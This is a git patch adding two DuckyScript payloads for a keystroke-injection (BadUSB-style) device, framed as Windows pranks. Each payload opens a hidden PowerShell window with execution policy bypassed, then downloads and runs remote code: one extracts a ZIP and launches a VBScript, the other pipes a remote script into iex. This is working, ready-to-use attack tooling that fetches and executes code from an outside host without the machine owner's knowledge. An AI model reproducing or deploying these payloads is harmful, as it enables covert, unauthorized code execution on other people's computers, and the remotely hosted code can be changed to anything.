From 637217dba072e9356c6dbc2a0804bc7c7e6db92c Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 27 Mar 2024 20:13:43 +0000 Subject: [PATCH] Add files via upload --- Pranks/Persisant-Goose.txt | 18 ++++++++++++++++++ Pranks/ScreenParty.txt | 15 +++++++++++++++ 2 files changed, 33 insertions(+) create mode 100644 Pranks/Persisant-Goose.txt create mode 100644 Pranks/ScreenParty.txt diff --git a/Pranks/Persisant-Goose.txt b/Pranks/Persisant-Goose.txt new file mode 100644 index 0000000..029d2a2 --- /dev/null +++ b/Pranks/Persisant-Goose.txt @@ -0,0 +1,18 @@ + +REM Title: Persistant goose prank. +REM Author: @beigeworm +REM Description: Spawn an annoying goose and replace it if it's killed by the user. +REM Target: Windows 10 and 11 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H +ENTER +DELAY 4000 +STRING $url = "https://github.com/beigeworm/assets/raw/main/Goose.zip";$tempFolder = $env:TMP;$zipFile = Join-Path -Path $tempFolder -ChildPath "Goose.zip";$extractPath = Join-Path -Path $tempFolder -ChildPath "Goose";Invoke-WebRequest -Uri $url -OutFile $zipFile;Expand-Archive -Path $zipFile -DestinationPath $extractPath;$vbscript = "$extractPath\Goose.vbs";& $vbscript +ENTER \ No newline at end of file diff --git a/Pranks/ScreenParty.txt b/Pranks/ScreenParty.txt new file mode 100644 index 0000000..d3b9cf1 --- /dev/null +++ b/Pranks/ScreenParty.txt @@ -0,0 +1,15 @@ + +REM Title: Screen Party +REM Author: @beigeworm +REM Description: Uses Powershell to display a form with changing colors +REM Target: Windows 10 and 11 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Pranks/Screen-Party.ps1 | iex +ENTER \ No newline at end of file